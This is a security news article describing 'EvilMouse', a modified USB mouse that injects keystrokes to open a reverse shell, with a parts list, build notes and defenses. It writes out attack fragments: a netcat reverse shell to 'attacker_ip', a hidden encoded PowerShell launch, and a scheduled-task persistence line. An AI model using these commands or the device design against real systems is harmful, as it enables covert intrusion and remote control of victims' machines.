$44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems

In a stark demonstration of low-cost hardware-based attacks, security researcher NEWO-J has unveiled “EvilMouse,” a fully functional USB mouse that doubles as a covert keystroke injector.

Priced at under $44 in parts, the device emulates a Human Interface Device (HID) to autonomously deliver payloads upon connection, bypassing traditional USB suspicion vectors like rogue thumb drives.

This build leverages the Raspberry Pi Pico RP2040 Zero microcontroller, underscoring vulnerabilities in endpoint detection amid rising physical access threats.

EvilMouse draws inspiration from Hak5’s USB Rubber Ducky but disguises malice within innocuous peripherals.

Unlike a bare USB stick flagged by employee training, a mouse evokes zero suspicion, especially with preserved optical tracking and button functionality. Total bill of materials (BOM) breaks down as follows:

Component	Quantity	Approx. Price
RP2040 Zero	1	$3
Adafruit 2-Port USB Hub Breakout	1	$5
Amazon Basics Mouse	1	$6
USB-C Pigtail Cable	1	$3
Rosin-core 60/40 Solder	1	$8
USB-C Data Cable	1	$8
Flux Paste	1	$6
Kapton Tape	1	$5
Dupont Wires	4	~$0.03
Total		~$44

Construction demanded precision engineering within the donor mouse’s compact shell. Initial challenges included excising plastic ribbing via multi-tool cutter and desoldering the stock PCB’s white USB connector with a flathead screwdriver.

The RP2040 Zero, flashed with CircuitPython firmware, handles HID emulation and payload execution.

Deviating from incompatible pico-ducky scripts (optimized for original Pico boards), custom code implements a Windows Defender-evading reverse shell to a listener host delivered in seconds via emulated keystrokes mimicking user input.

Key firmware logic spoofs HID reports over USB 2.0, injecting DuckyScript-like sequences: opening PowerShell (powershell.exe -WindowStyle Hidden -enc), encoding base64 payloads for obfuscation, and establishing TCP connections (e.g., nc -e cmd.exe attacker_ip 4444).

Source code resides at GitHub: NEWO-J/evilmouse, with extensibility for DuckyScript compatibility, Rust-based keystroke acceleration, or persistence via scheduled tasks (schtasks /create /sc onlogon /tn EvilTask /tr "powershell -ep bypass -c Invoke-WebRequest...").

Demo footage reveals admin-level compromise: Plugging EvilMouse into “Victim PC A” yields a Netcat listener shell on “Attacker PC B” within 5 seconds, granting remote code execution (RCE) without EDR alerts.

Enhancements like hidden CMD windows (-WindowStyle Hidden) or WMI persistence amplifies stealth.

Security implications are dire for air-gapped or high-security environments. While intended for education and red teaming, EvilMouse exposes gaps in HID trust models, USB hubs relay without scrutiny, and modern OSes (Windows 11, macOS Sonoma) auto-enumerate mice sans user prompts.

Defenses include USB device whitelisting via Group Policy (DeviceInstallRestrictionsendpoint behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring), and physical port controls like Kensington locks.

NEWO-J urges improvements: remote activation via magic packets, advanced AMSI bypasses (e.g., reflective PE loading), or multi-stage payloads.

At $44 versus $100+ for commercial Duckies, this democratizes sophisticated attacks, compelling CISOs to rethink peripheral supply chains.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post $44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems appeared first on Cyber Security News.